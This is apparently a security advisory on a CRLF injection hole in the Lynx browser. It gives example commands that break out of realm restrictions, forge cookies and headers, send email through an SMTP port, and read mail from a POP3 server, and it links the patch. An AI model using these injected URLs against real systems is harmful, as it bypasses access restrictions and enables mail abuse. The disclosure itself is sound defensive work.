Lynx CRLF Injection, part two This is a follow-up to my "Lynx CRLF Injection" post a few days ago. * Lynx has got a realm feature that restricts users from accessing any host apart from the host of its start page. That is, if you start Lynx with "lynx -realm http://www.site1.st/";, you are not allowed to go to http://www.site2.st/ . The CRLF Injection security hole allows users to break out of realms - the command: $ lynx -realm "http://www.site1.st/ HTTP/1.0 Host: www.site2.st " will show site2.st, despite the fact that it is outside of the realm. * It allows users to send arbitrary cookies, user agents and referers to a web server - even if you're using a restrictions option saying that you're not allowed to change user agent: $ lynx -restrictions=useragent "http://www.site1.st/ HTTP/1.0 User-Agent: Ulf 0.0 Referer: http://www.metaur.nu/ Cookie: user=ulf " * It is also possible to use this hole for communication with other types of servers than HTTP servers. You can send e-mails with it, for example - even if you're using a restrictions option saying that you're not allowed to send e-mails: $ lynx -restrictions=mail "http://mail.site1.st:587/ HTTP/1.0 HELO my.own.site MAIL FROM: <my.own@mail.address> RCPT TO: <info@site1.st> DATA From: my.own@mail.address To: info@site1.st Subject: This is.. This is a URL that sends an e-mail (?). . QUIT " You have to use port 587, as Lynx blocks port 25. The MTA will complain about the "GET / HTTP/1.0" string, but it still works. * You can even use this hole for reading e-mails from a POP3 server: $ lynx "http://mail.site1.st:110/ HTTP/1.0 USER ulf PASS xxxx LIST RETR 1 QUIT " The POP3 server will also complain about the "GET / HTTP/1.0" string, but it still works with this technology as well. * As previously noted, the holes listed above mostly affects programs that start Lynx, interactively or not, with a URL wholly or partially under the user's control. * The patch for this hole has moved to: ftp://lynx.isc.org/lynx/lynx2.8.4/patches/lynx2.8.4rel.1c.patch // Ulf Harnhammar ulfh@update.uu.se
